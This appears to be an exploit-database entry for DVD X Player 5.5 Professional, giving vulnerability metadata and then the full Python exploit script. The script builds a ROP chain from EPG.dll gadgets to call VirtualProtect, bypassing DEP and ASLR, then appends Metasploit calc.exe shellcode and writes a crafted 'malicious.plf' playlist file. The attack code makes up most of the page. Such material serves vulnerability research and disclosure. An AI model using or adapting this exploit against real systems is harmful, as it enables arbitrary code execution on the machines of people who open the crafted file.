DVD X Player 5.5 Professional (.plf) Universal DEP + ASLR BYPASS

vendor:

DVD X Player

by:

sickness

7.5

CVSS

HIGH

DEP + ASLR Bypass

CWE

Product Name: DVD X Player

Affected Version From: DVD X Player 5.5 Professional

Affected Version To: DVD X Player 5.5 Professional

Patch Exists: NO

Related CWE:

CPE: a:dvd-x-player:dvd_x_player:5.5

Metasploit:

Other Scripts:

Platforms Tested: Windows XP SP2, Windows XP SP3, Windows 7

2011

DVD X Player 5.5 Professional (.plf) Universal DEP + ASLR BYPASS

This exploit bypasses Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR) in DVD X Player 5.5 Professional (.plf) file. It allows arbitrary code execution.

Mitigation:

Update to a patched version of DVD X Player 5.5 Professional

Source

Exploit-DB raw data:

// # Author: sickness
// # Take a look at mona.py :) awesome tool developed by corelanc0d3r and his team: https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/
// # -----------------------------------------------------------
// # Exploit Title: DVD X Player 5.5 Professional (.plf) Universal DEP + ASLR BYPASS
// # Software Download: http://www.dvd-x-player.com/download.html#dvdPlayer
// # Date: 30/08/2011
// # PoC: http://www.exploit-db.com/exploits/17745/
// # Tested on: Windows XP SP2, Windows XP SP3, Windows 7
// # Testers: _ming, g0tmi1k, corelanc0d3r, ryujin, sinn3r O_o.

import sys,os

rop  = "\x02\x67\x62\x61" # POP EAX # RETN [EPG.dll] 
rop += "\x90\x90\x90\x90" # PADDING
rop += "\x90\x90\x90\x90" # PADDING
rop += "\x90\x90\x90\x90" # PADDING
rop += "\x90\x90\x90\x90" # PADDING
rop += "\x08\x11\x01\x10" # POINTER TO VirtualProtect() [IAT SkinScrollBar.Dll]
rop += "\xed\x06\x63\x61" # MOV EAX,DWORD PTR DS:[EAX] # RETN [EPG.dll] 
rop += "\xd8\x85\x63\x61" # XCHG EAX,ESI # RETN 00 [EPG.dll] 
rop += "\x02\xd2\x62\x61" # POP EBP # RETN [EPG.dll] 
rop += "\xc8\xca\x60\x61" # PUSH ESP [EPG.dll]
rop += "\x02\x67\x62\x61" # POP EAX # RETN [EPG.dll] 
rop += "\xff\xfa\xff\xff" # AFTER NEGATE --> 0x00000501
rop += "\x9c\x7d\x62\x61" # NEG EAX # RETN [EPG.dll] 
rop += "\x24\x01\x64\x61" # XCHG EAX,EBX # RETN [EPG.dll] 
rop += "\x02\x67\x62\x61" # POP EAX # RETN [EPG.dll] 
rop += "\xc0\xff\xff\xff" # AFTER NEGATE --> 0x00000040
rop += "\x9c\x7d\x62\x61" # NEG EAX # RETN [EPG.dll]
rop += "\xa2\x8b\x60\x61" # XCHG EAX,EDX # RETN [EPG.dll] 
rop += "\x04\xb8\x60\x61" # POP ECX # RETN [EPG.dll] 
rop += "\x54\x10\x66\x61" # WRITABLE LOCATION [EPG.dll]
rop += "\x87\xe5\x62\x61" # POP EDI # RETN [EPG.dll] 
rop += "\x1d\x08\x63\x61" # RETN (ROP NOP) [EPG.dll]
rop += "\x02\x67\x62\x61" # POP EAX # RETN [EPG.dll]
rop += "\x90\x90\x90\x90" # PADDING
rop += "\x31\x08\x62\x61" # PUSHAD # RETN [EPG.dll]

# Metasploit calc.exe shellcode -b "\x00\x0a\x0d\x1a\x20"
buf  = ""
buf += "\xba\xad\xe1\xd9\x21\xda\xd8\xd9\x74\x24\xf4\x5e\x33"
buf += "\xc9\xb1\x31\x83\xee\xfc\x31\x56\x0f\x03\x56\xa2\x03"
buf += "\x2c\xdd\x54\x41\xcf\x1e\xa4\x26\x59\xfb\x95\x66\x3d"
buf += "\x8f\x85\x56\x35\xdd\x29\x1c\x1b\xf6\xba\x50\xb4\xf9"
buf += "\x0b\xde\xe2\x34\x8c\x73\xd6\x57\x0e\x8e\x0b\xb8\x2f"
buf += "\x41\x5e\xb9\x68\xbc\x93\xeb\x21\xca\x06\x1c\x46\x86"
buf += "\x9a\x97\x14\x06\x9b\x44\xec\x29\x8a\xda\x67\x70\x0c"
buf += "\xdc\xa4\x08\x05\xc6\xa9\x35\xdf\x7d\x19\xc1\xde\x57"
buf += "\x50\x2a\x4c\x96\x5d\xd9\x8c\xde\x59\x02\xfb\x16\x9a"
buf += "\xbf\xfc\xec\xe1\x1b\x88\xf6\x41\xef\x2a\xd3\x70\x3c"
buf += "\xac\x90\x7e\x89\xba\xff\x62\x0c\x6e\x74\x9e\x85\x91"
buf += "\x5b\x17\xdd\xb5\x7f\x7c\x85\xd4\x26\xd8\x68\xe8\x39"
buf += "\x83\xd5\x4c\x31\x29\x01\xfd\x18\x27\xd4\x73\x27\x05"
buf += "\xd6\x8b\x28\x39\xbf\xba\xa3\xd6\xb8\x42\x66\x93\x37"
buf += "\x09\x2b\xb5\xdf\xd4\xb9\x84\xbd\xe6\x17\xca\xbb\x64"
buf += "\x92\xb2\x3f\x74\xd7\xb7\x04\x32\x0b\xc5\x15\xd7\x2b"
buf += "\x7a\x15\xf2\x4f\x1d\x85\x9e\xa1\xb8\x2d\x04\xbe"


exploit = "\x41" * 260 + rop + "\x90" * 20 + buf + "\x90" * 50
file = open("malicious.plf", "w")
file.write(exploit)
file.close()